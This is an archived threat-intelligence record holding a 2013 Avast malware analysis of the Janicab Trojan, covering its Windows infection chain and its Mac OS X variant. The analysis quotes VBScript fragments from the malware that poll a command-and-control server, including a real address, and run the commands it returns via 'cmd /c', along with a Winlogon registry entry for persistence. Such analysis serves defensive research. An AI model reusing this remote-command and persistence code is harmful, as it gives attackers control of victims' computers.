{ "id": "6691ed19-44de-416f-bb23-0b091035c73e", "created_at": "2026-04-06T00:06:07.847724Z", "updated_at": "2026-04-10T03:24:18.222432Z", "deleted_at": null, "sha1_hash": "9edab33dbc5a2e6710a911dc1fb6e8d53d17a6e4", "title": "Multisystem Trojan Janicab attacks Windows and MacOSX via scripts", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 188799, "plain_text": "Multisystem Trojan Janicab attacks Windows and MacOSX via\r\nscripts\r\nBy Threat Intelligence Team 23 Jul 2013\r\nArchived: 2026-04-05 18:25:03 UTC\r\nMultisystem Trojan Janicab attacks Windows and MacOSX via scripts\r\nOn Friday, July 12th a warning from an AVAST fan about a new polymorphic multisystem threat came to an inbox\r\nof AVAST. Moreover, an archive of malicious files discussed here were attached. Some of them have been\r\nuploaded to Virustotal and therefore they have been shared with computer security professionals on the same day.\r\nA weekend had passed by and articles full of excitement about a new Trojan for MacOs started to appear on the\r\nweb. We decided to make a thorough analysis and not to quickly jump on the bandwagon. The key observation is\r\nthat the final payload comes in the form of scripts needed to be interpreted by Windows Script Console resp;\r\nPython in the case of MacOs. Moreover a script generator that creates new malicious Windows file shortcuts was\r\nalso included.\r\nWindows version\r\nA chain of events that installs a malicious Visual Basic script on Windows platform looks like this:\r\nIn the beginning there is a malicious Office Open XML Document containing two embedded binary files. One of\r\nthem is called ActiveX.bin and it carries the main shell-code that is triggered by a widely spread exploit CVE-2012-0158 (under special settings ActiveX controls in MSCOMCTL.OCX trigger code execution). Shell-code\r\nitself in decrypted with a initial loop that uses 0xEE as a one-byte key. Then a few API functions necessary for\r\ndropping of another file are resolved by a hash (VirtualAlloc, CreateFile, ReadFile, WriteFile, GetTempPath,\r\nCloseHandle). In the figure we can see a check of a magic value 0xB19B00B5 (a shell-code consequently\r\nhttps://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/\r\nPage 1 of 6\n\nperforms this step twice, because a general memory search could return an address of its own assembly instead of\r\nthe location in the data). A temporary file \"a.l\" is created.\r\nThe step that follows is decrypted from the second embedded binary with a name ActiveX1.bin. It is loaded into a\r\nbuffer that is pointed by edi register. A two bytes and one double word are extracted and immediately used in a\r\ndecryption routine (one-byte XOR with a key additively changed by a constant in every iteration). A dynamic\r\nlinked library is dropped and loaded.\r\nThe dropper simply loads and executes two files in resources that are unencrypted. The first is a Word document\r\nthat is not malicious and its purpose is not to raise any suspicion after opening such a document. The second is a\r\nmalicious Visual Basic script \"1.vbe\" encoded with a Windows Script Encoder screnc.exe. This script is a final\r\npayload of the chain and is tagged with a version number \"1.0.4\".\r\nhttps://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/\r\nPage 2 of 6\n\nDepending on the system version, the malware seeks for an antivirus product in Windows Management\r\nInstrumentation (WMI) executing query \"Select displayName from AntiVirusProduct\" on the WMI object\r\n\"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter2\". It stores a value into the variable\r\ninstalledAV. Then it randomly chooses a youtube.com link from a hard-coded list and evaluates a regular\r\nexpression on the received content:\r\nrandLink = YouTubeLinks(Int((max-min+1)*Rnd+min))outputHTML = getPage(randLink, 60)Set objRE = New\r\nRegExp\r\nWith objRE\r\n.Pattern = \"just something i made up for fun, check out my website at (.*) bye bye\"\r\n.IgnoreCase = True\r\nEnd With\r\nSet objMatch = objRE.Execute( outputHTML )\r\nIf objMatch.Count = 1 Then\r\nserver = \"http://\" \u0026 objMatch.Item(0).Submatches(0)\r\nEnd If\r\nhttps://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/\r\nPage 3 of 6\n\nif getPage(server \u0026 \"/Status.php\", 30) = \"OK\" Then\r\nserverExists = 1\r\nEnd if\r\nSeeking the pattern on the web in cached YouTube pages it turned out that an expression \"111.90.152.210/cc\"\r\ncould have been returned as a C\u0026C server address.\r\nPersistence on the infected system is decided by C\u0026C:\r\nstartupMethod = getPage(server \u0026 \"/sMethod.php?av=\" \u0026 installedAV, 60)\r\nIf it commands a keyword \"reg\" as a startup method then a registry file containing lines\r\n\"[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]\r\n\"Shell\"=\"wscript.exe \\\"%userprofile%\\\\SystemFolder\\\\.vbe\\\"\"\r\nwill be imported.\r\nSpying functionality is not present in this variant. The main malicious action is constantly awaiting commands\r\nfrom C\u0026C to execute it on the victim's computer (getPage involves creating \"InternetExplorer.Application\" object\r\nand returning html content of the given address):\r\nWhile 1\r\nOn Error Resume Next\r\ncommandData = getPage(server \u0026 \"/gcm.php?sn=\" \u0026 Serial, 30)If not IsNull(commandData) And commandData\r\n\"\" Then\r\ns.Run \"cmd /c \" \u0026 c, 0\r\nEnd IfWScript.Sleep 60000\r\nWend\r\nMacOsX version\r\nAs mentioned in the introduction, the variant for MacOs uses Python compiled scripts and it is described with a\r\nlot of relevant screenshots (another reference is here). It uses a right-to-left override method to confuse the user\r\nwhile executing (Windows malware uses similar masking). The internal version number said \"3.0.6\" and so\r\nprobably it was longer in development.\r\nSpying activities consist of recording audio using command line tool called \"Sound eXchange\" and taking\r\nscreenshots controlled by mouse actions (resolved by a freely distributed command line tool mt which is a shortcut\r\nfor MouseTools ):\r\nhttps://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/\r\nPage 4 of 6\n\nFor comparison with the Windows version observe that a C\u0026C server is obtained in very similar way:\r\nPersistence is achieved by adding an initial malicious script \"runner.pyc\" into cron:\r\nScript Builder\r\nThere is a simple php script available that creates an archive with a file shortcut that runs a script derived from a\r\nparticular template and displays any desired distracting image. As a script template implicitly works a Windows\r\nversion of Janicab. Even if methods of generating new samples seem basic it is interesting to see malware coming\r\nas a whole package as it is in this case.\r\nhttps://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/\r\nPage 5 of 6\n\nSources\r\nFinally, MD5 of some selected samples with the detections of avast! engine are provided. Detections of samples\r\nconnected with the Windows version are very low prevalent within AV products.\r\nAcknowledgment\r\nSincere gratitude goes to my colleague Jaromír Hořejší for cooperation on this analysis.\r\nSource: https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/\r\nhttps://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/" ], "report_names": [ "multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775433967, "ts_updated_at": 1775791458, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9edab33dbc5a2e6710a911dc1fb6e8d53d17a6e4.pdf", "text": "https://archive.orkl.eu/9edab33dbc5a2e6710a911dc1fb6e8d53d17a6e4.txt", "img": "https://archive.orkl.eu/9edab33dbc5a2e6710a911dc1fb6e8d53d17a6e4.jpg" } }